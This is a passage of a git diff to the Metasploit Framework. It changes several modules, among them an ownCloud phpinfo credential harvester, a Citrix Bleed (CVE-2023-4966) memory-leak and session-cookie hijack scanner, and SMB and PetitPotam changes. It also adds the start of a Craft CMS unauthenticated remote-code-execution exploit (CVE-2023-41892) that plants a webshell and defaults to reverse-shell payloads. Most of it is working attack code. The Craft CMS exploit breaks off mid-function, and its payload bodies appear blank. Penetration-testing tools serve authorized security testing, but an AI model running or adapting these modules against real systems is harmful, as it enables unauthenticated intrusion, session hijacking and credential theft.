| #{field} <\/td> | ([^ ]+) <\/td><\/tr>"
+ end
+
+ def get_mappings
+ {
+ 'License Key' => 'OWNCLOUD_LICENSE_KEY',
+ 'Hostname' => 'HOSTNAME',
+ 'Home' => 'HOME',
+ 'Server Root' => 'APACHE_DOCUMENT_ROOT',
+ 'PWD' => 'PWD',
+ 'SMTP Host' => 'OWNCLOUD_MAIL_SMTP_HOST',
+ 'SMTP Port' => 'OWNCLOUD_MAIL_SMTP_PORT',
+ 'SMTP Username' => 'OWNCLOUD_MAIL_SMTP_NAME',
+ 'SMTP Password' => 'OWNCLOUD_MAIL_SMTP_PASSWORD',
+ 'ownCloud Username' => 'OWNCLOUD_ADMIN_USERNAME',
+ 'ownCloud Password' => 'OWNCLOUD_ADMIN_PASSWORD',
+ 'ownCloud Server Port' => 'SERVER_PORT',
+ 'DB Host' => 'OWNCLOUD_DB_HOST',
+ 'DB Username' => 'OWNCLOUD_DB_USERNAME',
+ 'DB Password' => 'OWNCLOUD_DB_PASSWORD',
+ 'DB Name' => 'OWNCLOUD_DB_NAME',
+ 'DB Type' => 'OWNCLOUD_DB_TYPE',
+ 'Redis Host' => 'OWNCLOUD_REDIS_HOST',
+ 'Redis Port' => 'OWNCLOUD_REDIS_PORT',
+ 'Redis DB' => 'OWNCLOUD_REDIS_DB',
+ 'Redis Password' => 'OWNCLOUD_REDIS_PASSWORD',
+ 'ObjectStore Endpoint' => 'OWNCLOUD_OBJECTSTORE_ENDPOINT',
+ 'ObjectStore Region' => 'OWNCLOUD_OBJECTSTORE_REGION',
+ 'ObjectStore Secret' => 'OWNCLOUD_OBJECTSTORE_SECRET',
+ 'ObjectStore Key' => 'OWNCLOUD_OBJECTSTORE_KEY',
+ 'ObjectStore Bucket' => 'OWNCLOUD_OBJECTSTORE_BUCKET'
+ }
+ end
+
+ def run
+ found = false
+ roots.each do |root|
+ break if found
+
+ endfiles.each do |endfile|
+ url = normalize_uri(target_uri.path, root, 'apps', 'graphapi', 'vendor', 'microsoft', 'microsoft-graph', 'tests', 'GetPhpInfo.php', endfile)
+ vprint_status("Checking: #{url}")
+ res = send_request_cgi(
+ 'uri' => url
+ )
+
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+ unless res.code == 200 && res.body.include?('phpinfo()')
+ print_bad("Not Exploited - HTTP Status Code: #{res.code}")
+ next
+ end
+ print_good("Found phpinfo page at: #{url}")
+
+ # store page
+ l = store_loot(
+ 'owncloud.phpinfo',
+ 'text/html',
+ rhost,
+ res.body,
+ 'phpinfo.html'
+ )
+ print_good("Loot stored to: #{l}")
+
+ # process the page
+ mappings = get_mappings
+ extracted_values = {}
+ mappings.each do |field_name, field|
+ if res.body =~ /#{field_regex(field)}/
+ extracted_values[field_name] = ::Regexp.last_match(1)
+ print_good("#{field_name}: #{extracted_values[field_name]}")
+ end
+ end
+
+ table = Rex::Text::Table.new(
+ 'Header' => 'Credentials',
+ 'Indent' => 2,
+ 'SortIndex' => 0,
+ 'Columns' => [ 'Type', 'Host', 'Username', 'Password', 'Notes']
+ )
+
+ if extracted_values['SMTP Password']
+ credential_data = {
+ protocol: 'tcp',
+ workspace_id: myworkspace_id,
+ service_name: 'SMTP',
+ origin_type: :service,
+ module_fullname: fullname,
+ status: Metasploit::Model::Login::Status::UNTRIED,
+ private_data: extracted_values['SMTP Password'],
+ private_type: :password
+ }
+ credential_data[:username] = extracted_values['SMTP Username'] if extracted_values['SMTP Username']
+ credential_data[:address] = extracted_values['SMTP Host'].nil? ? '127.0.0.1' : extracted_values['SMTP Host']
+ credential_data[:port] = extracted_values['SMTP Port'].nil? ? 25 : extracted_values['SMTP Port']
+
+ create_credential(credential_data)
+ table << ['SMTP', "#{credential_data[:address]}:#{credential_data[:port]}", credential_data[:username], extracted_values['SMTP Password'], '']
+ end
+
+ if extracted_values['ownCloud Password']
+ credential_data = {
+ protocol: 'tcp',
+ port: rport,
+ address: rhost,
+ workspace_id: myworkspace_id,
+ service_name: 'ownCloud',
+ origin_type: :service,
+ module_fullname: fullname,
+ status: Metasploit::Model::Login::Status::UNTRIED,
+ private_data: extracted_values['ownCloud Password'],
+ private_type: :password
+ }
+ credential_data[:username] = extracted_values['ownCloud Username'].nil? ? '' : extracted_values['ownCloud Username']
+
+ create_credential(credential_data)
+ table << ['ownCloud', "#{rhost}:#{rport}", credential_data[:username], extracted_values['ownCloud Password'], '']
+ end
+
+ ## DB
+ if extracted_values['DB Password']
+ credential_data = {
+ protocol: 'tcp',
+ port: extracted_values['DB Host'].split(':')[1],
+ address: extracted_values['DB Host'].split(':')[0],
+ workspace_id: myworkspace_id,
+ service_name: extracted_values['DB Type'],
+ origin_type: :service,
+ module_fullname: fullname,
+ status: Metasploit::Model::Login::Status::UNTRIED,
+ private_data: datastore['DB Password'],
+ private_type: :password
+ }
+ credential_data[:username] = extracted_values['DB Password'].nil? ? '' : extracted_values['DB Username']
+ create_credential(credential_data)
+ table << [extracted_values['DB Type'], "#{rhost}:#{rport}", credential_data[:username], extracted_values['DB Password'], '']
+ end
+
+ ## REDIS
+ if extracted_values['Redis Password']
+ credential_data = {
+ protocol: 'tcp',
+ port: extracted_values['Redis Host'],
+ address: extracted_values['Redis Port'],
+ workspace_id: myworkspace_id,
+ service_name: 'redis',
+ origin_type: :service,
+ module_fullname: fullname,
+ status: Metasploit::Model::Login::Status::UNTRIED,
+ private_data: extracted_values['Redis Password'],
+ private_type: :password
+ }
+
+ create_credential(credential_data)
+ table << ['redis', "#{extracted_values['Redis Host']}:#{extracted_values['Redis Port']}", '', extracted_values['Redis Password'], '']
+ end
+
+ ## OBJECTSTORE
+ if extracted_values['ObjectStore Secret'] && extracted_values['ObjectStore Key']
+ table << ['S3 Object Store', extracted_values['ObjectStore Region'], "Key: #{extracted_values['ObjectStore Key']}", "Secret: #{extracted_values['ObjectStore Secret']}", "Endpoint: #{extracted_values['ObjectStore Endpoint']}, Bucket: #{extracted_values['ObjectStore Bucket']}"]
+ end
+
+ print_good(table.to_s)
+ found = true
+ break # no need to keep going, we already got what we wanted
+ end
+ end
+ end
+end
diff --git a/modules/auxiliary/gather/windows_secrets_dump.rb b/modules/auxiliary/gather/windows_secrets_dump.rb
index 26cf9df4a5..c28749a1e4 100644
--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -635,12 +635,42 @@ class MetasploitModule < Msf::Auxiliary
password: datastore['SMBPass']
)
+ auth_type = RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+ if datastore['SMB::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+ fail_with(Msf::Exploit::Failure::BadConfig, 'The Smb::Rhostname option is required when using Kerberos authentication.') if datastore['Smb::Rhostname'].blank?
+ fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
+ fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
+ offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['Smb::KrbOfferedEncryptionTypes'])
+ fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
+
+ kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
+ host: datastore['DomainControllerRhost'],
+ hostname: datastore['Smb::Rhostname'],
+ proxies: datastore['Proxies'],
+ realm: datastore['SMBDomain'],
+ username: datastore['SMBUser'],
+ password: datastore['SMBPass'],
+ framework: framework,
+ framework_module: self,
+ cache_file: datastore['Smb::Krb5Ccname'].blank? ? nil : datastore['Smb::Krb5Ccname'],
+ mutual_auth: true,
+ dce_style: true,
+ use_gss_checksum: true,
+ ticket_storage: kerberos_ticket_storage,
+ offered_etypes: offered_etypes
+ )
+
+ dcerpc_client.extend(Msf::Exploit::Remote::DCERPC::KerberosAuthentication)
+ dcerpc_client.kerberos_authenticator = kerberos_authenticator
+ auth_type = RubySMB::Dcerpc::RPC_C_AUTHN_GSS_NEGOTIATE
+ end
+
dcerpc_client.connect
vprint_status('Binding to DRSR...')
dcerpc_client.bind(
endpoint: RubySMB::Dcerpc::Drsr,
auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
- auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+ auth_type: auth_type
)
vprint_status('Bound to DRSR')
diff --git a/modules/auxiliary/scanner/dcerpc/petitpotam.rb b/modules/auxiliary/scanner/dcerpc/petitpotam.rb
index 6375d32829..29e7750455 100644
--- a/modules/auxiliary/scanner/dcerpc/petitpotam.rb
+++ b/modules/auxiliary/scanner/dcerpc/petitpotam.rb
@@ -6,36 +6,38 @@
require 'windows_error'
require 'ruby_smb'
require 'ruby_smb/error'
-require 'ruby_smb/dcerpc/encrypting_file_system'
+require 'ruby_smb/dcerpc/lsarpc'
+require 'ruby_smb/dcerpc/efsrpc'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Auxiliary::Scanner
-
- EncryptingFileSystem = RubySMB::Dcerpc::EncryptingFileSystem
+ include Msf::Auxiliary::Report
METHODS = %w[EfsRpcOpenFileRaw EfsRpcEncryptFileSrv EfsRpcDecryptFileSrv EfsRpcQueryUsersOnFile EfsRpcQueryRecoveryAgents].freeze
+ # The LSARPC UUID should be used for all pipe handles, except for the efsrpc one. For that one use
+ # Efsrpc and it's normal UUID
PIPE_HANDLES = {
lsarpc: {
- uuid: EncryptingFileSystem::LSARPC_UUID,
- opts: ['\\lsarpc'.freeze]
+ endpoint: RubySMB::Dcerpc::Lsarpc,
+ filename: 'lsarpc'.freeze
},
efsrpc: {
- uuid: EncryptingFileSystem::EFSRPC_UUID,
- opts: ['\\efsrpc'.freeze]
+ endpoint: RubySMB::Dcerpc::Efsrpc,
+ filename: 'efsrpc'.freeze
},
samr: {
- uuid: EncryptingFileSystem::LSARPC_UUID,
- opts: ['\\samr'.freeze]
+ endpoint: RubySMB::Dcerpc::Lsarpc,
+ filename: 'samr'.freeze
},
lsass: {
- uuid: EncryptingFileSystem::LSARPC_UUID,
- opts: ['\\lsass'.freeze]
+ endpoint: RubySMB::Dcerpc::Lsarpc,
+ filename: 'lsass'.freeze
},
netlogon: {
- uuid: EncryptingFileSystem::LSARPC_UUID,
- opts: ['\\netlogon'.freeze]
+ endpoint: RubySMB::Dcerpc::Lsarpc,
+ filename: 'netlogon'.freeze
}
}.freeze
@@ -78,19 +80,32 @@ class MetasploitModule < Msf::Auxiliary
rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
end
+ report_service(service_data)
+
+ begin
+ @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+ rescue RubySMB::Error::RubySMBError => e
+ raise StandardError, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e})."
+ end
handle_args = PIPE_HANDLES[datastore['PIPE'].to_sym]
fail_with(Failure::BadConfig, "Invalid pipe: #{datastore['PIPE']}") unless handle_args
- @handle = dcerpc_handle(
- handle_args[:uuid],
+ # rename tree_file
+ @pipe = @tree.open_file(filename: handle_args[:filename], write: true, read: true)
+ handle = dcerpc_handle(
+ handle_args[:endpoint]::UUID,
handle_args.fetch(:version, '1.0'),
handle_args.fetch(:protocol, 'ncacn_np'),
- handle_args[:opts]
+ ["\\#{handle_args[:filename]}"]
)
- vprint_status("Binding to #{@handle} ...")
- dcerpc_bind(@handle)
- vprint_status("Bound to #{@handle} ...")
+ vprint_status("Binding to #{handle} ...")
+ @pipe.bind(
+ endpoint: handle_args[:endpoint],
+ auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
+ auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+ )
+ vprint_status("Bound to #{handle} ...")
if datastore['METHOD'] == 'Automatic'
methods = METHODS
@@ -107,8 +122,14 @@ class MetasploitModule < Msf::Auxiliary
if response.nil?
unless method == methods.last
# rebind if we got a DCERPC error (as indicated by no response) and there are more methods to try
- vprint_status("Rebinding to #{@handle} ...")
- dcerpc_bind(@handle)
+ vprint_status("Rebinding to #{handle} ...")
+ @pipe.close
+ @pipe = @tree.open_file(filename: handle_args[:filename], write: true, read: true)
+ @pipe.bind(
+ endpoint: handle_args[:endpoint],
+ auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
+ auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+ )
end
next
@@ -129,16 +150,45 @@ class MetasploitModule < Msf::Auxiliary
end
end
+ def cleanup
+ if @pipe
+ @pipe.close
+ @pipe = nil
+ end
+
+ if @tree
+ @tree.disconnect!
+ @tree = nil
+ end
+
+ super
+ end
+
def efs_call(name, **kwargs)
- request = EncryptingFileSystem.const_get("#{name}Request").new(**kwargs)
+ request = RubySMB::Dcerpc::Efsrpc.const_get("#{name}Request").new(**kwargs)
begin
- raw_response = dcerpc.call(request.opnum, request.to_binary_s)
+ raw_response = @pipe.dcerpc_request(
+ request,
+ auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
+ auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+ )
rescue Rex::Proto::DCERPC::Exceptions::Fault => e
print_error "The #{name} Encrypting File System RPC request failed (#{e.message})."
return nil
end
- EncryptingFileSystem.const_get("#{name}Response").read(raw_response)
+ RubySMB::Dcerpc::Efsrpc.const_get("#{name}Response").read(raw_response)
+ end
+
+ def service_data
+ {
+ host: rhost,
+ port: rport,
+ host_name: simple.client.default_name,
+ proto: 'tcp',
+ name: 'smb',
+ info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+ }
end
end
diff --git a/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb b/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
new file mode 100644
index 0000000000..55afb294be
--- /dev/null
+++ b/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ COOKIE_NAME = 'NSC_AAAC'.freeze
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Citrix ADC (NetScaler) Bleed Scanner',
+ 'Description' => %q{
+ This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory for a
+ target Citrix ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
+ },
+ 'Author' => [
+ 'Dylan Pindur', # original assetnote writeup
+ 'Spencer McIntyre' # metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2023-4966'],
+ ['URL', 'https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966']
+ ],
+ 'DisclosureDate' => '2023-10-25',
+ 'License' => MSF_LICENSE,
+ 'Notes' => {
+ 'Stability' => [],
+ 'Reliability' => [],
+ 'SideEffects' => [],
+ 'AKA' => ['Citrix Bleed']
+ },
+ 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }
+ )
+ )
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'Base path', '/'])
+ ])
+ end
+
+ def get_user_for_cookie(cookie)
+ vprint_status("#{peer} - Checking cookie: #{cookie}")
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'logon/LogonPoint/Authentication/GetUserName'),
+ 'headers' => {
+ 'Cookie' => "#{COOKIE_NAME}=#{cookie}"
+ }
+ )
+ return nil unless res&.code == 200
+
+ res.body.strip
+ end
+
+ def run_host(_target_host)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'oauth/idp/.well-known/openid-configuration'),
+ 'headers' => {
+ 'Host' => Rex::Text.rand_text_alpha(24812),
+ 'Connection' => 'close'
+ }
+ )
+ return nil unless res&.code == 200
+ return nil unless res.headers['Content-Type'].present?
+ return nil unless res.headers['Content-Type'].downcase.start_with?('application/json')
+
+ username = nil
+ res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|
+ cookie = cookie.first
+ username = get_user_for_cookie(cookie)
+ next unless username
+
+ print_good("#{peer} - Cookie: #{COOKIE_NAME}=#{cookie} Username: #{username}")
+ report_vuln
+ end
+
+ return if username
+
+ begin
+ JSON.parse(res.body)
+ rescue JSON::ParserError
+ print_status("#{peer} - The target is vulnerable but no valid cookies were leaked.")
+ report_vuln
+ else
+ print_status("#{peer} - The target does not appear vulnerable.")
+ end
+ end
+
+ def report_vuln
+ super(
+ host: rhost,
+ port: rport,
+ name: name,
+ refs: references
+ )
+ end
+end
diff --git a/modules/auxiliary/scanner/http/grafana_plugin_traversal.rb b/modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
index 241c3f0320..b3a444fd9d 100644
--- a/modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
+++ b/modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
@@ -26,14 +26,15 @@ class MetasploitModule < Msf::Auxiliary
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
},
+ 'DisclosureDate' => '2021-12-02',
'References' => [
['CVE', '2021-43798'],
['URL', 'https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p'],
['URL', 'https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/'],
['EDB', '50581'],
['URL', 'https://github.com/jas502n/Grafana-CVE-2021-43798'],
- ['URL', 'https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce']
-
+ ['URL', 'https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce'],
+ ['URL', 'https://labs.detectify.com/security-guidance/how-i-found-the-grafana-zero-day-path-traversal-exploit-that-gave-me-access-to-your-logs/']
]
)
)
diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb
index f33cc51ecc..3ae74834c0 100644
--- a/modules/auxiliary/scanner/smb/smb_login.rb
+++ b/modules/auxiliary/scanner/smb/smb_login.rb
@@ -14,6 +14,7 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::CommandShell
Aliases = [
'auxiliary/scanner/smb/login'
@@ -62,7 +63,25 @@ class MetasploitModule < Msf::Auxiliary
]
)
- deregister_options('USERNAME', 'PASSWORD', 'PASSWORD_SPRAY')
+ options_to_deregister = %w[USERNAME PASSWORD PASSWORD_SPRAY CommandShellCleanupCommand AutoVerifySession]
+
+ unless framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
+ # Don't give the option to create a session unless smb sessions are enabled
+ options_to_deregister << 'CreateSession'
+ end
+
+ deregister_options(*options_to_deregister)
+
+ end
+
+ def create_session?
+ # The CreateSession option is de-registered if SMB_SESSION_TYPE is not enabled
+ # but the option can still be set/saved so check to see if we should use it
+ if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
+ datastore['CreateSession']
+ else
+ false
+ end
end
def run_host(ip)
@@ -105,7 +124,8 @@ class MetasploitModule < Msf::Auxiliary
send_delay: datastore['TCP::send_delay'],
framework: framework,
framework_module: self,
- kerberos_authenticator_factory: kerberos_authenticator_factory
+ kerberos_authenticator_factory: kerberos_authenticator_factory,
+ use_client_as_proof: create_session?
)
if datastore['DETECT_ANY_AUTH']
@@ -148,6 +168,15 @@ class MetasploitModule < Msf::Auxiliary
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}' #{result.access_level}"
report_creds(ip, rport, result)
+ if create_session?
+ begin
+ smb_client = result.proof
+ session_setup(result, smb_client)
+ rescue StandardError => e
+ elog('Failed to setup the session', error: e)
+ print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
+ end
+ end
:next_user
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
if datastore['VERBOSE']
@@ -243,4 +272,31 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(login_data)
end
+
+ # @param [Metasploit::Framework::LoginScanner::Result] result
+ # @param [RubySMB::Client] client
+ # @return [Msf::Sessions::SMB]
+ def session_setup(result, client)
+ return unless client
+
+ # Create a new session
+ rstream = client.dispatcher.tcp_socket
+ sess = Msf::Sessions::SMB.new(
+ rstream,
+ {
+ client: client
+ }
+ )
+
+ merge_me = {
+ 'USERPASS_FILE' => nil,
+ 'USER_FILE' => nil,
+ 'PASS_FILE' => nil,
+ 'USERNAME' => result.credential.public,
+ 'PASSWORD' => result.credential.private
+ }
+
+ start_session(self, nil, merge_me, false, sess.rstream, sess)
+ end
+
end
diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb
index 9b628df2c7..3ae2fb3f99 100644
--- a/modules/auxiliary/scanner/snmp/snmp_enum.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb
@@ -19,7 +19,9 @@ class MetasploitModule < Msf::Auxiliary
[ 'URL', 'https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],
[ 'URL', 'https://net-snmp.sourceforge.io/docs/man/snmpwalk.html' ],
[ 'URL', 'http://www.nothink.org/codes/snmpcheck/index.php' ],
- ],
+ [ 'CVE', '1999-0508' ], # Weak password
+ [ 'CVE', '1999-0517' ],
+ [ 'CVE', '1999-0516' ] ],
'Author' => 'Matteo Cantoni ',
'License' => MSF_LICENSE
))
diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb
index 14976c9e08..89dc055f44 100644
--- a/modules/auxiliary/scanner/snmp/snmp_login.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_login.rb
@@ -20,7 +20,9 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'hdm',
'References' =>
[
- [ 'CVE', '1999-0508'] # Weak password
+ [ 'CVE', '1999-0508' ], # Weak password
+ [ 'CVE', '1999-0517' ],
+ [ 'CVE', '1999-0516' ],
],
'License' => MSF_LICENSE
)
diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb
index 2ed04c230f..8efdbc1579 100644
--- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
)
deregister_options(
- 'RHOST','PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS', 'USERPASS_FILE', 'DB_ALL_PASS', 'DB_ALL_CREDS'
+ 'PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS', 'USERPASS_FILE', 'DB_ALL_PASS', 'DB_ALL_CREDS'
)
@good_credentials = {}
diff --git a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
new file mode 100644
index 0000000000..f2e47c6d15
--- /dev/null
+++ b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
@@ -0,0 +1,268 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::FileDropper
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Craft CMS unauthenticated Remote Code Execution (RCE)',
+ 'Description' => %q{
+ This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular
+ content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability
+ allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity
+ of the application.
+
+ The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class
+ which allows to run arbitrary PHP code by escalating the object creation calling some methods available in
+ `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which
+ stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that
+ facilitates the reading of images, performance of image processing tasks, and writing of results back
+ to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the
+ Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the
+ malicious PHP code and gaining access to the system.
+
+ Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain
+ access to the underlying operating system as the user that the web services are running as (typically www-data).
+ },
+ 'Author' => [
+ 'h00die-gr3y ', # Metasploit module
+ 'Thanh', # discovery
+ 'chybeta' # poc
+ ],
+ 'References' => [
+ [ 'CVE', '2023-41892' ],
+ [ 'URL', 'https://blog.calif.io/p/craftcms-rce' ],
+ [ 'URL', 'https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/' ],
+ [ 'URL', 'https://github.com/advisories/GHSA-4w8r-3xrw-v25g' ],
+ [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892' ],
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => [ 'unix', 'linux', 'php' ],
+ 'Privileged' => false,
+ 'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],
+ 'Targets' => [
+ [
+ 'PHP',
+ {
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Type' => :php,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+ }
+ }
+ ],
+ [
+ 'Unix Command',
+ {
+ 'Platform' => [ 'unix', 'linux' ],
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_bash'
+ }
+ }
+ ],
+ [
+ 'Linux Dropper',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X64, ARCH_X86 ],
+ 'Type' => :linux_dropper,
+ 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+ }
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-09-13',
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'RPORT' => 443
+ },
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE ],
+ 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+ 'Reliability' => [ REPEATABLE_SESSION ]
+ }
+ )
+ )
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),
+ OptString.new('WEBSHELL', [
+ false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''
+ ]),
+ OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])
+ ]
+ )
+ end
+
+ def check_phpinfo
+ # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT
+ @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(datastore['TARGETURI']),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'vars_post' => {
+ 'action' => 'conditions/render',
+ 'configObject[class]' => 'craft\elements\conditions\ElementCondition',
+ 'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
+ }
+ })
+ if res && res.body
+ # parse HTML to find the upload directory and the document root provided by phpinfo command output
+ html = res.get_html_document
+ unless html.blank?
+ tr_items = html.css('tr td')
+ tr_items.each_with_index do |item, i|
+ next if tr_items[i + 1].nil?
+
+ if item.text.casecmp?('upload_tmp_dir')
+ if tr_items[i + 1].text.casecmp?('no value')
+ @config['upload_tmp_dir'] = '/tmp'
+ else
+ @config['upload_tmp_dir'] = tr_items[i + 1].text.strip
+ end
+ end
+ @config['document_root'] = tr_items[i + 1].text.strip if item.text.casecmp?('$_SERVER[\'DOCUMENT_ROOT\']')
+ end
+ end
+ end
+ end
+
+ def upload_webshell
+ # randomize file name if option WEBSHELL is not set
+ if datastore['WEBSHELL'].blank?
+ @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"
+ else
+ @webshell_name = datastore['WEBSHELL'].to_s
+ end
+
+ # select webshell depending on the target setting (PHP or others).
+ @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+ @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+ if target['Type'] == :php
+ # create the MSL payload
+ # payload = ""
+ payload = <<~EOS
+
+
+
+
+
+ EOS
+ else
+ # create the MSL payload
+ # payload = ""
+ payload = <<~EOS
+
+
+
+
+
+ EOS
+ end
+
+ # construct multipart form data with Imagick MSL payload
